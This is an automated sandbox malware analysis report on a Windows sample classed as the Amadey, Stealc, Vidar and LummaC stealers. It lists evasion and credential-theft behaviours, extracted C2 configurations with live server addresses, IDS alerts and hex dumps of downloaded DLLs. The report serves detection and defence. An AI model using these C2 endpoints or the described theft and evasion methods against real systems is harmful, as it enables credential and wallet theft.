Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1562256
MD5: 91b37d2cd25d901080a13743131a5229
SHA1: 0b77ba7424bf660b1bd8f4f6c01208cb8eaaef9e
SHA256: d84a99942feba00f43b585deed2d7b44caa59488c61ec4d8b118b407d4f4c6f9
Tags: exeuser-Bitsight
Infos:

Detection

Amadey, LummaC Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files to the document folder of the user
Drops PE files to the user root directory
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
Monitors registry run keys for changes
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the user directory
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file does not import any functions
PE file overlay found
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: https://frogs-severz.sbs/0 Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/nss3.dll8 Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/nss3.dll$ Avira URL Cloud: Label: malware
Source: https://frogs-severz.sbs// Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/mozglue.dllz Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000018.00000003.1993446233.0000000004B00000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: file.exe.2700.0.memstrmin Malware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\eDPQZkT[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe ReversingLabs: Detection: 47%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA56C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6CA56C80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBAA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 0_2_6CBAA9A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBA44C0 PK11_PubEncrypt, 0_2_6CBA44C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB74420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free, 0_2_6CB74420
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49828 version: TLS 1.0
Source: unknown HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.8:49725 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.8:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.8:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.53.6:443 -> 192.168.2.8:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.8:49839 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.8:49842 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.8:49852 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.8:61175 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.8:61182 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.8:61188 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2037877310.000000006CABD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2038311729.000000006CC7F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2038311729.000000006CC7F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2037877310.000000006CABD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: chrome.exe Memory has grown: Private usage: 1MB later: 39MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49704 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.8:49704 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.8:49704
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.8:49704 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.8:49704
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.8:49704 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.8:61146 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.8:61152
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:61174 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:61182 -> 104.21.88.250:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:61182 -> 104.21.88.250:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:61175 -> 104.21.88.250:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:61175 -> 104.21.88.250:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor IPs: 185.215.113.43
Detected non-DNS traffic on DNS port
Source: global traffic TCP traffic: 192.168.2.8:61085 -> 1.1.1.1:53
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 25 Nov 2024 11:08:23 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 25 Nov 2024 11:08:45 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 25 Nov 2024 11:08:47 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 25 Nov 2024 11:08:48 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 